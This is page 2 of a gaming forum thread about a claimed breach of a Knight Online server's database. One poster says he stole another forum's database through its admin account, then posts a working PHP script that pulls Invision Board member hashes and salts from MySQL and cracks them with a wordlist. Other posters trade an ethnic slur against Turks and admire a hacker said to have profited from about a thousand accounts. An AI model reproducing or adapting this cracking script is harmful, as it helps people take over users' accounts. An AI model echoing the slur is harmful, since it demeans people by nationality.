Page 2 of 6 FirstFirst 123456 LastLast
Results 16 to 30 of 85

usko database rehacked

This is a discussion on usko database rehacked within the General Chat forums, part of the Knight Online (ko4life.com) category; well 7 day after we see database :wub:...
Page: 2


  1. #16
    00:00
    Guest

    Default

    well 7 day after we see database :wub:

  2. #17
    Senior Member
    Join Date
    Mar 2006
    Posts
    1,554

    Default

    Originally posted by 00:00
    well 7 day after we see database *:wub:

    i honestly dont believe him



    edit : i like the part where he say he will help to fix it


    why did he fucking wasted his time if he isnt gonna abuse his db access ...? hack a db isnt something u do in 5 min

  3. #18
    Imhotep
    Guest

    Default

    Originally posted by Flippy

    i honestly dont believe him

    +1

  4. #19
    00:00
    Guest

    Default

    Originally posted by Flippy+--><div class='quotetop'>QUOTE(Flippy)</div>
    <!--QuoteBegin-00:00
    well 7 day after we see database *:wub:



    why did he fucking wasted his time if he isnt gonna abuse his db access ...? hack a db isnt something u do in 5 min[/b]
    find turk frnd to read all this forum, he make this shit 2 months before and saying now well hack hackers gamers first :P

  5. #20
    Vlein
    Guest

    Default

    u can make a php script that reads thru a big list of "word list" (password list for brute force) for the md5, we did this to fuckgaming before, we downloaded their database thru their root admin, and made a php script read thru the word list. so people with passwords that were common in the english language would pop up.

  6. #21
    Senior Member
    Join Date
    Apr 2006
    Location
    Poland
    Posts
    207

    Default

    u cant decrypt md5'ed passwords B)

  7. #22
    Vlein
    Guest

    Default

    wanna bet?

  8. #23
    Senior Member
    Join Date
    Mar 2006
    Posts
    1,554

    Default

    Originally posted by 00:00+--><div class='quotetop'>QUOTE(00:00)</div>
    Originally posted by Flippy@
    <!--QuoteBegin-00:00

    well 7 day after we see database *:wub:





    why did he fucking wasted his time if he isnt gonna abuse his db access ...? hack a db isnt something u do in 5 min
    find turk frnd to read all this forum, he make this shit 2 months before and saying now well hack hackers gamers first :P[/b]


    then i really love the part when he says dw we wont hack etc etc

    another proof u cant trust most turks <_<

  9. #24
    Senior Member
    Join Date
    Mar 2006
    Posts
    1,554

    Default

    Originally posted by Vlein
    wanna bet?

    i dont consider finding pw with a brute force system decrypt...

  10. #25
    Vlein
    Guest

    Default

    Code:
    <?php
    
    $lib = 'big.txt'; //plug an option custom wordlist here
    
    $link = mysql_connect("aonic.net", "fuck", "gaming");
    
    mysql_select_db("gaming");
    
    
    
    if(is_numeric($argv[1])){
    
    	$query = "SELECT converge_id AS id, converge_pass_hash as hash, converge_pass_salt as salt, m.name as name 
    
     * * FROM ibf_members_converge, ibf_members AS m 
    
     * * WHERE converge_id = '{$argv[1]}'
    
     * * AND m.id = converge_id";
    
    }else{
    
    	$query = "SELECT converge_id as id, converge_pass_hash as hash, converge_pass_salt as salt, m.name as name 
    
     * * FROM ibf_members_converge, ibf_members AS m 
    
     * * WHERE name = '{$argv[1]}' 
    
     * * AND converge_id = id";
    
    }
    
    $result = mysql_query($query) or die("Query failed : " . mysql_error());
    
    $r = mysql_fetch_assoc($result);
    
    
    
    echo "Running $lib on $r['hash']...";
    
    
    
    if(isset($r['salt'])){
    
    	foreach(file($lib) as $x){
    
     *$y = md5( md5($r['salt']).md5(trim($x)) );
    
     *
    
     *if ( $y == $r['hash'] ){
    
     *	die("nrResult:nr$y === $xnr");
    
     *}/*else{
    
     *	echo "nr".trim($x)." !== $hash";
    
     *}*/
    
    	}
    
    }
    
    
    
    ?>

    Code:
    e540211aa60e3e20014038a3de8a94f8
    ^thats all a "md5 hash" is

  11. #26
    Imhotep
    Guest

    Default

    ownt ownt ownt :P

  12. #27
    Senior Member festo's Avatar
    Join Date
    Mar 2006
    Location
    England
    Posts
    2,820

    Default

    Start
    Convert MD5 hash into password 'Decrypts the password
    End

    SORTED B)

  13. #28
    spikespiegel
    Guest

    Default

    Cumhur Onat?

    as far as i know he hacked over 1.000 ppl..

    he made about 20.000$ with it :wub:

  14. #29
    00:00
    Guest

    Default

    heh i thnk festo hacked database :wub:

  15. #30
    Senior Member
    Join Date
    Mar 2006
    Posts
    168

    Default

    2 Of my clannies got hacked out of nowhere. They never share their acc. Wtf is going on?

Page 2 of 6 FirstFirst 123456 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •